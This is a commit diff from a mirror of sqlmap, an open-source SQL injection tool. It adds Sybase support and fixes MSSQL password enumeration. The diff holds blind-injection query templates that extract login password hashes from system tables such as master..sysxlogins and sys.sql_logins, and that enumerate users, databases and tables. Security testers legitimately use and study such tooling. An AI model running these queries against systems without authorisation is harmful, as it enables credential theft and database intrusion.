sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-25 19:13:48 +03:00
Code Issues Packages Projects Releases Wiki Activity

update for Sybase and major bug fix for --passwords on MSSQL

Browse Source
This commit is contained in:
Miroslav Stampar 2010-10-25 22:11:38 +00:00
parent 9b56fbafbe
commit 8a9a57c709
3 changed files with 15 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
plugins/dbms/sybase/enumeration.py
View File

@ -16,9 +16,3 @@ from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
def __init__(self):
GenericEnumeration.__init__(self, "Sybase")
def getPasswordHashes(self):
warnMsg = "on Sybase it is not possible to enumerate the user password hashes"
logger.warn(warnMsg)
return {}

14
plugins/generic/enumeration.py
View File

@ -167,7 +167,7 @@ class Enumeration:
for index in indexRange:
if kb.dbms == "Sybase":
query = rootQuery.blind.query % (','.join(map(lambda x: "'%s'" % x, kb.data.cachedUsers)) if kb.data.cachedUsers else "'%s'" % randomStr())
query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
elif condition:
query = rootQuery.blind.query2 % index
else:
@ -282,7 +282,9 @@ class Enumeration:
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
if kb.dbms == "Microsoft SQL Server":
if kb.dbms == "Sybase":
query = rootQuery.blind.query % (user, (kb.data.cachedUsersPasswords[-1] if kb.data.cachedUsersPasswords else " "))
elif kb.dbms == "Microsoft SQL Server":
if kb.dbmsVersion[0] in ( "2005", "2008" ):
query = rootQuery.blind.query2 % (user, index, user)
else:
@ -664,7 +666,9 @@ class Enumeration:
indexRange = getRange(count)
for index in indexRange:
if kb.dbms == "MySQL" and not kb.data.has_information_schema:
if kb.dbms == "Sybase":
query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ")
elif kb.dbms == "MySQL" and not kb.data.has_information_schema:
query = rootQuery.blind.query2 % index
else:
query = rootQuery.blind.query % index
@ -785,7 +789,9 @@ class Enumeration:
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
if kb.dbms in ("SQLite", "Firebird"):
if kb.dbms == "Sybase":
query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " "))
elif kb.dbms in ("SQLite", "Firebird"):
query = rootQuery.blind.query % index
else:
query = rootQuery.blind.query % (db, index)

10
xml/queries.xml
View File

@ -254,7 +254,7 @@
</users>
<passwords>
<inband query="SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins" query2="SELECT name, master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins" condition="name"/>
<blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..sysxlogins WHERE name='%s')" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM sys.sql_logins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
<blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM master..sysxlogins WHERE name='%s')" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM sys.sql_logins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
</passwords>
<!-- NOTE: in Microsoft SQL Server there is no query to enumerate DBMS users privileges -->
<privileges/>
@ -473,21 +473,21 @@
<is_dba query="PATINDEX('%sa_role%', SHOW_ROLE())>0"/>
<users>
<inband query="SELECT name FROM master..syslogins ORDER BY 1"/>
<blind query="SELECT MIN(name) FROM master..syslogins WHERE name NOT IN (%s)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins"/>
<blind query="SELECT MIN(name) FROM master..syslogins WHERE name > '%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins"/>
</users>
<passwords>
<inband query="SELECT name, password FROM master..syslogins" condition="name"/>
<blind query="SELECT TOP 1 password FROM master..syslogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..syslogins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..syslogins WHERE name='%s'"/>
<blind query="SELECT MIN(password) FROM master..syslogins WHERE name='%s' AND password > '%s'" count="SELECT LTRIM(STR(COUNT(password))) FROM master..syslogins WHERE name='%s'"/>
</passwords>
<privileges/>
<roles/>
<dbs>
<inband query="SELECT name FROM master..sysdatabases ORDER BY 1"/>
<blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
<blind query="SELECT MIN(name) FROM master..sysdatabases WHERE name > '%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
</dbs>
<tables>
<inband query="SELECT name FROM %s..sysobjects WHERE type IN ('U') ORDER BY 1"/>
<blind query="SELECT TOP 1 name FROM %s..sysobjects WHERE type IN ('U') AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE type IN ('U'))" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE type IN ('U')"/>
<blind query="SELECT MIN(name) FROM %s..sysobjects WHERE type IN ('U') AND name > '%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE type IN ('U')"/>
</tables>
<columns>
<inband query="SELECT %s..syscolumns.name, TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/>